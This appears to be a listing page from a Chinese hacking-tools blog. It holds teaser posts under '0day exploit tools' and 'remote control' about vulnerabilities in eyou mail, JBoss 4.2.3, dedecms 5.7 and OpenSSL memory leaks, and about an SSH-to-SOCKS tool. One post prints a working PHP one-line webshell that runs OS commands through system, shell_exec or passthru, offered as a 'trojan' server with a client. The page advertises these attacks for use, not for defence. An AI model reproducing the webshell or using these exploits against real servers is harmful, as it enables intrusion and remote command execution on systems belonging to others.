• 1
预览模式: 普通 | 列表


eyou 邮件系统存在SQL注入漏洞,利用此漏洞可以获取webshell


查看更多...

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 3749

【河马】ssh转socks工具--附源代码



【基本简介】 可以简单方便的连接ssh服务器。在SSH服务器用户名和密码处填写对应的用户名和密码,
并选中启动后就链接、掉线后自动连接、启用动态SOCKS,设置完毕后点击保存按钮并点击连接按钮就可以开
始连接啦。

查看更多...

Tags: remote control

分类:远程控制 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1517

在ssl数据包中有一个数据结构,包含了数据的长度(len)和内容(payload),这个数据结构会经过一次

memcpy,这个函数的最后一个参数为复制的长度len,如果len等于payload的长度,就相安无事,
如果len大于payload的长度就会越界,泄露多出来的那段内存,len是一个无符号整数,最大值为
65535,所有能泄露64k的数据,当payload的长度为0时,泄露最大的内存数据。

查看更多...

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1562


JBoss-4.2.3.GA  invoker code exec 漏洞
成功利用该漏洞可以执行任意命令,包括jsp
webshell等。

查看更多...

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2575

黑客狙击者v1.0



1.将压缩包解压到C:\sniper或D:\sniper目录(目录不存在,自行创建)

2. 切换到软件目录,然后执行:sniper_svc.exe /install 即可

查看更多...

Tags: websmart

分类:其它工具软件 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1402


20140228的补丁对soft_edit.php增加了
if(!preg_match("#[_=&///?\.a-zA-Z0-9-]+$#i", $softurl))
            {
                ShowMsg("确定软件地址提交正确!", "-1");

查看更多...

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 64 | 引用: 0 | 查看次数: 8266


dedecms 5.7 member_soft_edit.php存在
代码执行漏洞
20140228的补丁对soft_edit.php增加了
if(!preg_match("#[_=&///?\.a-zA-Z0-9-]+$#i", $softurl))

查看更多...

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 86 | 引用: 0 | 查看次数: 10237


【河马】 php一句话木马服务端和客户端v1.1
版本1功能:软件是一个php脚本木马,将<?php echo $_GET[2]($_GET[0]($_GET[1]));?>
写入文件webshell.php中,然后使用软件进行连接,就可以执行OS命令,
支持的函数有system,shell_exec,passthru

查看更多...

Tags: 远程控制

分类:远程控制 | 固定链接 | 评论: 2 | 引用: 0 | 查看次数: 1347
  • 1
无标题文档